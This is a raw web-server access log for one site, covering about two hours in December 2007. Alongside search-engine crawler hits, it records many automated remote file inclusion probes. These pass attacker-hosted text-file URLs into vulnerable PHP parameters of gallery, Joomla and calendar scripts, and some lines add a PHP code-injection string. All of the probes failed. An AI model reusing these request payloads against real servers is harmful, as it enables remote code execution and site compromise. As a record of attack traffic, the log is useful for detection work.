74.6.25.102 - - [29/Dec/2007:14:44:46 -0800] "GET /logs/access_071027.log HTTP/1.0" 200 191919 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:14:46:55 -0800] "GET /menu.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:14:46:57 -0800] "GET /logs/menu.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.208.99.103 - - [29/Dec/2007:14:48:04 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.99.103 - - [29/Dec/2007:14:48:04 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.99.103 - - [29/Dec/2007:14:48:04 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:14:49:11 -0800] "GET /index3.php?pag=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:14:49:11 -0800] "GET /logs/index3.php?pag=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:14:51:43 -0800] "GET /logs/file.php?body=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:14:51:43 -0800] "GET /file.php?body=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
83.64.132.254 - - [29/Dec/2007:14:52:05 -0800] "GET //errors.php?error=http://bestnews.altervista.org/secure_scan_id.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
83.64.132.254 - - [29/Dec/2007:14:52:05 -0800] "GET /logs//errors.php?error=http://bestnews.altervista.org/secure_scan_id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
74.6.22.230 - - [29/Dec/2007:14:56:09 -0800] "GET /bikes/?N=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:14:56:21 -0800] "GET /logs/menu.php?body=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:14:56:21 -0800] "GET /menu.php?body=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:14:57:14 -0800] "GET /contact.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:14:57:14 -0800] "GET /logs/contact.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
121.97.223.161 - - [29/Dec/2007:14:57:45 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.97.223.161 - - [29/Dec/2007:14:57:45 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.97.223.161 - - [29/Dec/2007:14:57:46 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.3.209 - - [29/Dec/2007:14:59:17 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kunstverein-muenchen.de//webcalendar/source/source.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.53.3.209 - - [29/Dec/2007:14:59:17 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kunstverein-muenchen.de//webcalendar/source/source.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.30.179.201 - - [29/Dec/2007:15:02:17 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.227 - - [29/Dec/2007:15:02:17 -0800] "GET /logs/access_071204.log HTTP/1.0" 200 9222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:15:02:21 -0800] "GET /logs/about.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:15:02:21 -0800] "GET /about.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:15:02:23 -0800] "GET /about.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:15:02:23 -0800] "GET /logs/about.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:15:06:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:15:06:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.178.176.36 - - [29/Dec/2007:15:07:38 -0800] "GET /index.php?pageurl=http://www.vincent-prado.com/blog/wp.rss.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
66.178.176.36 - - [29/Dec/2007:15:07:38 -0800] "GET /logs/index.php?pageurl=http://www.vincent-prado.com/blog/wp.rss.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:15:08:30 -0800] "GET /menu.php?go1=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:15:08:31 -0800] "GET /logs/menu.php?go1=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.34.200.228 - - [29/Dec/2007:15:11:38 -0800] "GET /logs/access_071214.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.200.228 - - [29/Dec/2007:15:11:39 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.200.228 - - [29/Dec/2007:15:11:40 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:15:12:01 -0800] "GET /logs//protection.php?action=logout&siteurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:15:12:01 -0800] "GET //protection.php?action=logout&siteurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.249.70.241 - - [29/Dec/2007:15:12:44 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [29/Dec/2007:15:13:05 -0800] "GET /logs/access_070814.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:15:13:29 -0800] "GET /logs/about.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:15:13:30 -0800] "GET /about.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:15:13:33 -0800] "GET /index3.php?pag=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:15:13:33 -0800] "GET /logs/index3.php?pag=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:15:13:33 -0800] "GET /index.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:15:13:33 -0800] "GET /logs/index.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:15:20:04 -0800] "GET /logs/index.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:15:20:04 -0800] "GET /index.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
74.6.25.164 - - [29/Dec/2007:15:22:33 -0800] "GET /logs/access_071205.log HTTP/1.0" 200 50665 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.145.104 - - [29/Dec/2007:15:24:00 -0800] "GET /logs/access_071215.log/modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [29/Dec/2007:15:24:01 -0800] "GET /modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [29/Dec/2007:15:24:01 -0800] "GET /logs/modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [29/Dec/2007:15:26:35 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.0.141.110 - - [29/Dec/2007:15:27:59 -0800] "GET /logs/access_071215.log/modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [29/Dec/2007:15:27:59 -0800] "GET /modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [29/Dec/2007:15:28:00 -0800] "GET /logs/modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [29/Dec/2007:15:30:30 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.123.144.98 - - [29/Dec/2007:15:32:58 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "McBot/5.001 (windows; U; NT4.0; en-us)" "www.dmulk.com"
80.123.144.98 - - [29/Dec/2007:15:33:05 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "McBot/5.001 (windows; U; NT4.0; en-us)" "www.dmulk.com"
80.123.144.98 - - [29/Dec/2007:15:33:27 -0800] "GET /presto/?N=D HTTP/1.1" 200 526 "-" "McBot/5.001 (windows; U; NT4.0; en-us)" "www.dmulk.com"
205.234.215.83 - - [29/Dec/2007:15:34:36 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
205.234.215.83 - - [29/Dec/2007:15:34:36 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
81.52.143.16 - - [29/Dec/2007:15:34:51 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [29/Dec/2007:15:34:53 -0800] "GET /presto HTTP/1.1" 301 91 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
74.6.23.231 - - [29/Dec/2007:15:44:34 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.152 - - [29/Dec/2007:15:48:15 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:15:56:19 -0800] "GET /send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:15:56:19 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:15:56:28 -0800] "GET /config.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:15:56:28 -0800] "GET /logs/config.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:15:58:09 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:15:58:09 -0800] "GET /send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
80.97.20.22 - - [29/Dec/2007:15:58:44 -0800] "GET /logs/access_071215.log/modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.130.178 - - [29/Dec/2007:15:58:50 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.130.178 - - [29/Dec/2007:15:58:51 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.97.20.22 - - [29/Dec/2007:15:58:51 -0800] "GET /modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [29/Dec/2007:15:58:52 -0800] "GET /logs/modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:15:59:17 -0800] "GET /logs/contact.php?go1=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:15:59:17 -0800] "GET /contact.php?go1=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
74.6.28.79 - - [29/Dec/2007:16:00:26 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.97.20.22 - - [29/Dec/2007:16:03:55 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:16:04:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:16:04:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
99.167.237.30 - - [29/Dec/2007:16:06:20 -0800] "GET /logs/access_071109.log HTTP/1.1" 200 29983 "http://www.google.com/search?hl=en&rls=GGIC%2CGGIC%3A2006-50%2CGGIC%3Aen&q=%2238.105.83.12%22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:16:07:08 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:16:07:08 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.52.146.176 - - [29/Dec/2007:16:11:08 -0800] "GET /home.php?pageurl=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
87.106.130.178 - - [29/Dec/2007:16:11:47 -0800] "GET /logs/access_071215.log/skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:16:12:33 -0800] "GET /index.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:16:12:34 -0800] "GET /logs/index.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:16:13:04 -0800] "GET /file.php?body=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:16:13:04 -0800] "GET /logs/file.php?body=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.249.70.241 - - [29/Dec/2007:16:15:13 -0800] "GET /logs/access_070627.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:16:19:21 -0800] "GET /send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
68.15.104.155 - - [29/Dec/2007:16:19:21 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.249.70.241 - - [29/Dec/2007:16:19:22 -0800] "GET /logs/access_071118.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
207.58.166.231 - - [29/Dec/2007:16:19:23 -0800] "GET /logs/file.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
207.58.166.231 - - [29/Dec/2007:16:19:24 -0800] "GET /file.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.52.146.176 - - [29/Dec/2007:16:19:48 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:16:22:16 -0800] "GET /logs/file.php?go1=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:16:22:16 -0800] "GET /file.php?go1=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:16:22:42 -0800] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:16:22:42 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.249.70.241 - - [29/Dec/2007:16:22:54 -0800] "GET /logs/access_071024.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:16:24:06 -0800] "GET /logs/home.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:16:24:07 -0800] "GET /home.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:16:24:49 -0800] "GET /about.php?=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:16:24:49 -0800] "GET /logs/about.php?=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
66.249.70.241 - - [29/Dec/2007:16:26:23 -0800] "GET /logs/access_071101.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
